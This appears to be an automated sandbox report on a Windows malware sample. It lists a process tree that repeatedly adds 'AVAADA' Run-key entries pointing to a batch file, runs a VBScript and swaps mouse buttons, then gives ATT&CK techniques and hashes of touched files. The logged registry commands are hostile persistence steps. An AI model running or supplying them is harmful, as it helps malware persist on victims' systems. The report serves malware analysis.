    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:1852
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:4600
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:4996
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:6920
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:4440
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7836
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:3284
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7532
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:5924
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7632
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:4476
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8128
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:1856
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8012
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:1852
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:7688
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:7748
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:4448
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:5236
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:6388
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:1260
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:3968
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:1260
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:1852
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:8200
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:8216
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8348
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8360
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8376
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8448
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8460
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8596
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8608
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8620
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8688
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8704
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8840
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8852
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8888
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:8932
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:8944
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:9080
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:9096
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:9104
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:9196
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8292
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8484
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8504
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8508
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:8696
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8716
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8940
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8956
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8944
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:9020
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:9040
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8196
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8264
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8476
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:3588
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8668
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:392
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:9012
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:9008
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:8232
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7488
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:5264
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8772
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8776
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:9008
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:6480
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:7116
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:7200
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7488
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:4896
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:5288
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:4856
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:2220
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:1984
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8464
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8468
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:6920
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8112
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7612
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:5844
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:1988
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8472
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:1528
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7884
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:8208
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:4032
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8040
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:4204
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:8668
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:8752
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:3656
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:9032
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:404
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7744
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7872
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    PID:1972
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:7340
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:8424
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:4008
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:5760
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:3688
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:8848
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:6568
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:7612
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7504
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:5844
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\mail.vbs"
    3⤵
    PID:784
- - C:\Windows\system32\notepad.exe
    notepad.exe
    3⤵
    PID:1500
- - C:\Windows\system32\rundll32.exe
    RUNDLL32 USER32.DLL,SwapMouseButton
    3⤵
    PID:4304
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:7872
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\freddo.bat /f
    3⤵
    - Modifies registry key
    PID:1972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scripting

T1064

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
24e03c22c9e4c0b80ceeeb57b3b86296

SHA1
e0766bd974450d91d6bffeae214fc6a3518a0a64

SHA256
c89e7fee6e82016a545715380e515dc7f11f9701ff91af58fc227df7525c9cfa

SHA512
0264229fa13b3135f7247af80ae32e74e42e5ba0b6bd45bbccfcdcdf0700a5aac9821e8e15c0093ee33515172574e55f74d8c8c11cc27f472c356a94a0fb16e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5f5661160e1a025f3d0d438c6d2ebcf5

SHA1
f81b59f5ff5d46140919814af67bd73b84583328

SHA256
0ecdfcd234583526617c9b4b1d1c0bbbc36f2cc7e97fadd3f8b829f9732e2a84

SHA512
6e0301c55de2f3134b3448af7fc495cfa2135a8c1c5d958c4bbe0f78acb4594c7c6abb82da467c34604f0dc267a0933fe74ca77a9a04e037abd8cbd0e4a58b83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\48e2afa6-0516-4067-9192-10d8e774d6ff.tmp

Filesize
24KB

MD5
2c0b749bfbae7b149b2bfa3e5781239e

SHA1
5c128948a869faf125c48d79655ee14ed179e526

SHA256
b2d16fce01183d594d9f0bfae88e342e955c66365f81acf680d9c9df8c529a99

SHA512
596ad1acc9e2a6882030ee9598ab1dacba271fea8d27b0d040946a6987610ada860918ccb545c253b8f90aef7f35ad3daf2d5feb2c933d034920244baeffb2d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6f83fe2e-ff8d-42e3-b00e-b9887a58a57d.tmp

Filesize
9KB

MD5
6382eceaa6e6af237d692c077ec86e96

SHA1
22fc8f1833866eb1146cc01275b3d14812deb368

SHA256
fc4352cae53248197f6369f48c7f3c89d0fbf0244bd71c59599beb56d33de707

SHA512
2743227802038b5e0b9aadaa711a658f3627b7d92a2ef256521e130313ad33e59de0226331ec08e60044829b5a55065492ef71983293974b44b0c003100f1d6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
d1f604157b0745a40453afb93a6caa42

SHA1
3d5d77429b03674ebb0ba34d925ba1b09310df5e

SHA256
468456974fd86b33647942820dce7284879acfab9e9e6eca008e1fdcf9006fb5

SHA512
0644ce93724a57dedd8aec208e5a038e323a1b9871d5046d58a87c60479626693e6c8f25b7c7f7b60fd35aac133d2e660ecbd8f8d579ad1fc6703ae117a485a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
dcae552634ab3490939cf5687a95d461

SHA1
b67ee5f04690a5569dc71337972981c9cefe82a1

SHA256
80a3f2bba6fa1a001aea2b9ade1e9de1881a75888de1a0986ee7caf16ea84c16

SHA512
d903f0bf56b495688b7b7bfa68e53a9485285a3b1dd9df07efd59697c1283017b123399d812d897e3e76c0a0586e2386f46bbf1cfc96f40d57981544863a837f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
67KB

MD5
d2d55f8057f8b03c94a81f3839b348b9

SHA1
37c399584539734ff679e3c66309498c8b2dd4d9

SHA256
6e273f3491917d37f4dbb6c3f4d3f862cada25c20a36b245ea7c6bd860fb400c

SHA512
7bcdbb9e8d005a532ec12485a9c4b777ddec4aee66333757cdae3f84811099a574e719d45eb4487072d0162fa4654349dd73705a8d1913834535b1a3e2247dc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
35KB

MD5
a053b626552864ee4e93f684617be84c

SHA1
977f090d070e793072bfb7dce69812dc41883d4e

SHA256
25b3ad881a0a88c6228e12688078638fe0b96210d0f0e20721e3c911a5b37dd4

SHA512
f7b444b1a1c465a4614cd1b9bd678875251f44e227abaaaf1fa6b35bb67bb25932b9b11cc8fabd19d2d5d6e80c6ad0b15149869e6e41f6345db3d49f08683e36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
84KB

MD5
74e33b4b54f4d1f3da06ab47c5936a13

SHA1
6e5976d593b6ee3dca3c4dbbb90071b76e1cd85c

SHA256
535fc48679c38decd459ad656bdd6914e539754265244d0cc7b1da6bddf3e287

SHA512
79218e8ee50484af968480ff9b211815c97c3f3035414e685aa5d15d9b4152682d87b66202339f212bf3b463a074bf7a4431107b50303f28e2eb4b17843991c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
1.1MB

MD5
b36bf0bc042f10f9061a6f5e555b2dca

SHA1
76a0b3e1af74adbd78d75d93bc7bf38d4caae779

SHA256
db2243add96c4820c823ce724ea39b818179f8b3bd35d5f30830300640a5df5a

SHA512
742be95e1469fcf9dd4d3c3a68b9be6c90186f05f04bdc61b9bec4bf20469b1cbe2ca7a2909f661f64ee385837ee31789b98cd6a78fd3f3a1d169ab5d20fb1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002b

Filesize
1024KB

MD5
4322f0449af173fb3994d2bef7ecb2e4

SHA1
b6ee5c6f76b8eee448f6b4b2b56fa1ec39653934

SHA256
0502e6e2f3fc54a30dea0eb07eb19a395c7ea6fc273321a49a4cc977a59b7cc9

SHA512
d8bae6131a5a8a1fcabb2d7efebc6cdbba27955fb77484a5d87dbce7a237c0cd5e19b74b4dad28312929ad732d3b80cf3d7f15f059c88438d0bc6ff9535ceeef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000036

Filesize
243KB

MD5
930b5b08297c63eaaf8e90c77ed8af3c

SHA1
58cf1869e79f3630701e6d844eb39a5f057bbe2d

SHA256
95c957668d3149a2e067d1a293f07c1dea10c7bc54ac86da7f2bddd53c211243

SHA512
77f1fab10725a809f4d00bc94d5178d7c2b1ee48edb252d4f88dc50d76285c1d1380010cae949b9b2ce42ab0dba26eee17e59d575190427bd368ab7635662206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000056

Filesize
83KB

MD5
6cdda0518e9e33423ddeb086fc931d17

SHA1
f3d328fd675729064052a72a2843ec1d7ef41a8b

SHA256
7744697fbb99c040c3077112937312989516e40a7ee9b80476cdc3b1a48cc87b

SHA512
777b4a925868b77b663b211fd75d22ba7c48e4dabffdb4cbf67e70db0ee129c133c4d354fda9e216e92fd9593558ab190a28bd87c246c7ead2c9861fbfe9fd5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000058

Filesize
86KB

MD5
b5bec6c584b31bdbcabb68b90a231213

SHA1
6a6ce642aac71dae6c77d486938a7ac937f41a9f

SHA256
823d8e0f94240618f0503839c3c31292bc21642fba09264dd2f5175093a4bf38

SHA512
82aed3dcf82e95495e377228c8b9b20ecafb132f4d4e7afba5a614fc5a6bba71ba660d3ea162d6d4a028a49346f19b154a9b3ef938d63b52b5c79349ba604727

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005b

Filesize
108KB

MD5
9adb6dc5390312a0bbc070cec81b2b77

SHA1
9685d391fa8714d3001d1a38dea3448f817f88de

SHA256
aaf3991fe75cdcb4712f10c813bd5fe08febf347feab852c433be6b1bbffd580

SHA512
42c2ed1bfb233ac406996aa7d4ea20e1f300ba8e766b0962d7cc755045e9e05709d5d5e3b61e7d3f407dc706bdb0bf18180213ec028998bf29ffcb304e8030ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000060

Filesize
45KB

MD5
bee8a3e713ef0f2427267948a43c8ba8

SHA1
7291d4584adaff960f8fbefa41c72993c49db20c

SHA256
377f164768ad2885acffa12571c923e0a59c62df95bb9e659afbb4a13a313020

SHA512
748fb9a7c36ec62e236beb1555ecdceb347876b5cd5c2dbf0544d96f91be7556579c79460f89a68ea8347a181d848bc564442a9a53021f4e71977678691842df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006b

Filesize
98KB

MD5
f587a09780e30e57366cfd2587c0b99c

SHA1
b47e42d82ac295bee5dfddc72649ca726cfaba34

SHA256
a44482268749921b19d998e5c1119744c785b5271a65635a1ae5787b6ef4541f

SHA512
c273bcaa6ae3c581d3d8af34963c01fc5434adf0b7c95ab92be7eceac7e24c78416f9e10d770d0823f108e6962fffb2d1b60983d2b521134016ca9272fb23b6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006c

Filesize
86KB

MD5
48be073b768a8ec611759e7d172598f9

SHA1
764e22ad52107bd6b8acc780570148cb9297e5e3

SHA256
efb8f00509c5beab7a43f2a5ac3678ad29eaadc4413d9b2ecf17e6a9d674d9ea

SHA512
4d6c3b4ebbd3ed6e14772aaadb35aa0e20f4f0fa24d7efa7bca27c87a949ce900f05e4f48c501c972072280fed486177ec829b81c6bff0489f64f19115e5259c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006e

Filesize
24KB

MD5
b82ca47ee5d42100e589bdd94e57936e

SHA1
0dad0cd7d0472248b9b409b02122d13bab513b4c

SHA256
d3c59060e591b3839ec59cad150c0a38a2a2a6ba4cc4dc5530f68be54f14ef1d

SHA512
58840a773a3a6cb0913e6a542934daecaef9c0eeab626446a29a70cd6d063fdb012229ff2ccfa283e3c05bc2a91a7cac331293965264715bdb9020f162dc7383

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006f

Filesize
198KB

MD5
319e0c36436ee0bf24476acbcc83565c

SHA1
fb2658d5791fe5b37424119557ab8cee30acdc54

SHA256
f6562ea52e056b979d6f52932ae57b7afb04486b10b0ebde22c5b51f502c69d1

SHA512
ad902b9a010cf99bdedba405cad0387890a9ff90a9c91f6a3220cdceec1b08ecb97a326aef01b28d8d0aacb5f2a16f02f673e196bdb69fc68b3f636139059902

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00007c

Filesize
1024KB

MD5
370342ce51445e68ee677b56ac8992c2

SHA1
ae86b56902e668c27de4c1b2a1a197da17f89163

SHA256
61a2bba2783a9c376c47354fa148974aa36295fc60029c41d6252775e6e84310

SHA512
b47e765be3d54f94e67d75e1f0ced3404946cf193dfc5ad1e4db0c932df90bcfe9bdde7a3c9888a134d2601e38162eb38282dd401344a34c5dcde9ff893dec1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00008a

Filesize
202KB
